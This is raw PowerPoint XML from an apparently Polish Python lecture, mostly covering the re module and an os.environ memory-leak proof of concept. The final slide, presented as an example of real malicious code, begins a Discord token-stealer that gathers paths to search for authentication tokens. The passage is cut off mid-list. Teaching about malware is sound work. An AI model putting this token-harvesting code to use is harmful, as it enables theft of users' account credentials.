              <a:t>Jeśli wartość zmiennej środowiskowej zostanie nadpisana przez dłuższą wartość, stara wartość nigdy nie zniknie – ciągłe nadpisywanie może spowodować że zabraknie pamięci. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Environ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> może zostać zniszczony jeśli zabraknie jej w momencie nadpisywania, ale nie można tego wykorzystać w inny "zły" sposób</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://bugs.python.org/issue675259</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>, TZ to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>TimeZone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>&gt;&gt;&gt; import os</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> 1:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>...     for e in ['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>','of','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>']:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>...             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>os.environ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>['TZ'] = e</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>...             del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>os.environ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>['TZ']</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3296097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A84755-5F9E-CCA3-1011-848800D7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Flagi biblioteki re (domyślnie wyłączone)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621B67-D3EF-13A5-11CF-8B6C13A95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200"/>
            <a:ext cx="11231562" cy="4195526"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.VERBOSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – umożliwia pisanie ładnych wyrażeń, gdzie białe znaki wewnątrz wyrażeń są ignorowane i można dodawać komentarze, np.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6478C1D-4093-1DAE-3F2B-DB63DA98B20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862" y="3271114"/>
            <a:ext cx="9844376" cy="179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87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54D72E-48CD-3A2E-3715-9F9CE723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biblioteki re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E89E36-59F8-42CD-9C74-BA80C1AE4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582876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.compile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>=0) tworzy obiekt-wyrażenie regularne, którego można potem używać do dopasowani</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Tworzenie tych obiektów nie jest konieczne, np.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>prog = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>re.compile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(pattern)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>prog.match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(string)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>jest równoważne:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>re.match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(pattern, string)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5235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54D72E-48CD-3A2E-3715-9F9CE723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biblioteki re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E89E36-59F8-42CD-9C74-BA80C1AE4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582876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>re.search(pattern, string, flags=0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> szuka w stringu pierwszego wystąpienia wyrażenia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> i zwraca obiekt dopasowania (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>match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) albo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>None</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>pattern, string, flags=0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> sprawdza czy wyrażenie pasuje od początku stringa i zwraca obiekt dopasowania (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>match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) albo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>None</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Przykład czym się różnią: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B4F024F-7C61-0323-C06C-4B0AC30838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3001" y="5125066"/>
            <a:ext cx="7857387" cy="141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93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54D72E-48CD-3A2E-3715-9F9CE723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biblioteki re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E89E36-59F8-42CD-9C74-BA80C1AE4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560749"/>
            <a:ext cx="11090274" cy="4582876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.fullmatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>, string, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>=0) sprawdza czy cały string (od początku do końca) pasuje do wyrażenia i zwraca albo obiekt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> albo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>None</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>pattern, string, maxsplit=0, flags=0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> dzieli stringa na fragmenty pomiędzy wystąpieniami wyrażenia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> i zwraca je w postaci listy (jeśli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> zawiera nawiasy (), rzeczy z nawiasów też będą na liście). Przykłady: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01430DD-0E6C-1289-4688-2E4D91A129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512" y="4016332"/>
            <a:ext cx="8004288" cy="305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65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54D72E-48CD-3A2E-3715-9F9CE723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biblioteki re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E89E36-59F8-42CD-9C74-BA80C1AE4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582876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.findall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>, string, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>=0) zwraca listę stringów lub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>tupli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> zawierającą wszystkie dopasowania do wzorca – jeśli wyrażenie zawiera grupy (), w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>tuplach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> znajdą się wyniki dopasowania do tych grup. Przykłady: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 err="1"/>
              <a:t>re.finditer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – to samo, tyle że zwraca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>iterator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> po obiektach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>match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B2838B9-A70F-6F87-E731-E0232BA1E2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866" y="3540992"/>
            <a:ext cx="10767402" cy="168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56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54D72E-48CD-3A2E-3715-9F9CE723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biblioteki re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E89E36-59F8-42CD-9C74-BA80C1AE4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582876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>re.sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(pattern, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>repl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, string, count=0, flags=0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – zwraca string, gdzie pierwsze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> znalezionych wystąpień wyrażenia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> zostało zastąpionych przez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>repl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (które jest stringiem lub funkcją której jedynym argumentem jest obiekt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>=0 oznacza że wszystkie wystąpienia zostaną zastąpione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>re.subn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> robi to samo, tylko zwraca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>tuplę</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (string, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>liczbaZastąpień</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>)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C737CE2-6985-3456-DCFA-F9CDF97AC0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8615"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="645633" y="4759882"/>
            <a:ext cx="12842890" cy="193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3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54D72E-48CD-3A2E-3715-9F9CE723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biblioteki re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E89E36-59F8-42CD-9C74-BA80C1AE4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582876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>re.sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(pattern, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>repl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, string, count=0, flags=0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – zwraca string, gdzie pierwsze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> znalezionych wystąpień wyrażenia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> zostało zastąpionych przez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>repl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (które jest stringiem lub funkcją której jedynym argumentem jest obiekt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>=0 oznacza że wszystkie wystąpienia zostaną zastąpione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5EA16E6-5B72-2990-4DD2-7A82525A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0000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="629920" y="4081005"/>
            <a:ext cx="11562080" cy="277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60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9A478D-62BC-E801-B21E-18B2F2D2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biblioteki re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F02514-6825-7781-2797-F9D0FEEB6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re.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>) dodaje '\' w odpowiednich ilościach tak, aby wszystkie znaki były traktowane jako zwykłe a nie specjalne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E52D51D-9B57-2C3C-6FBC-B7BB1FDA79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455" y="3137761"/>
            <a:ext cx="11358620" cy="331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81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8115E1-8D0E-4DEA-66C8-AFFD92AB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obiektów-wyrażeń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693CF4-8920-B28E-17E2-0EB00FDF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897201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Argumenty to (string[, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>[, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>endpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>]])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>fullmatch</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>findall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>finditer</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Argumenty to (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>repl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>, string, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>=0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>subn</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(string, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>maxsplit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>=0)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49870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8115E1-8D0E-4DEA-66C8-AFFD92AB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Atrybuty obiektów-wyrażeń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693CF4-8920-B28E-17E2-0EB00FDF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897201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – flagi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – liczba grup () w wyrażeniu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> – wyrażenie w postaci stringa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80712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8BBA78-D0AE-4043-58E5-D52DBF1B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prawdziwie złośliwego kodu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96D397-79E5-C46F-199F-D2C14636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744801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Szukanie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>tokenów</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>autentyfikacyjnych</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (te ścieżki zostaną potem przeszukane)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>os.getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>('LOCALAPPDATA')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>roaming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>os.getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>('APPDATA')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>paths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> = {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>    '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Discord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>roaming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> + '\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Discord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>    '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Discord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>roaming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> + '\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>discordcanary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>    '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Discord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> PTB': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>roaming</a:t>
            </a:r>
            <a:r>
